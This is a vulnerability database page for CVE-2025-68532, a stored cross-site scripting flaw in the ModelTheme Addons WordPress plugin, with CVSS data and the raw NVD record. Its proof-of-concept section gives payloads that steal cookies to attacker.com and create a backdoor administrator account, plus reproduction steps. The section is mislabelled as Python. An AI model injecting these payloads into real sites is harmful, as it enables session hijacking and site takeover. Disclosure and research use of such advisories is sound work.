Security Vulnerability Report
中文
CVE-2025-68532 CVSS 6.5 MEDIUM

CVE-2025-68532

Published: 2025-12-24 13:16:23
Last Modified: 2026-04-27 19:16:29

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in modeltheme ModelTheme Addons for WPBakery and Elementor modeltheme-addons-for-wpbakery allows Stored XSS.This issue affects ModelTheme Addons for WPBakery and Elementor: from n/a through < 1.5.6.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

ModelTheme Addons for WPBakery and Elementor < 1.5.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-68532 Stored XSS PoC --> <!-- Inject this payload into vulnerable input fields in ModelTheme Addons plugin --> <script>alert(document.cookie)</script> <!-- More sophisticated payload for session hijacking --> <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)"> <!-- XSS payload that creates a backdoor admin user --> <script> fetch(window.location.origin+'/wp-admin/admin-ajax.php', { method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: 'action=adduser&user_login=hacker&[email protected]&role=administrator' }); </script> <!-- Reproduction steps --> <!-- 1. Install ModelTheme Addons plugin < 1.5.6 on WordPress --> <!-- 2. Navigate to WPBakery Page Builder or Elementor editor --> <!-- 3. Insert the payload into any ModelTheme Addons shortcode parameter --> <!-- 4. Save and view the page --> <!-- 5. The JavaScript code will execute in the victim's browser -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68532", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:22.603", "lastModified": "2026-04-27T19:16:28.647", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in modeltheme ModelTheme Addons for WPBakery and Elementor modeltheme-addons-for-wpbakery allows Stored XSS.This issue affects ModelTheme Addons for WPBakery and Elementor: from n/a through < 1.5.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/modeltheme-addons-for-wpbakery/vulnerability/wordpress-modeltheme-addons-for-wpbakery-and-elementor-plugin-1-5-6-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}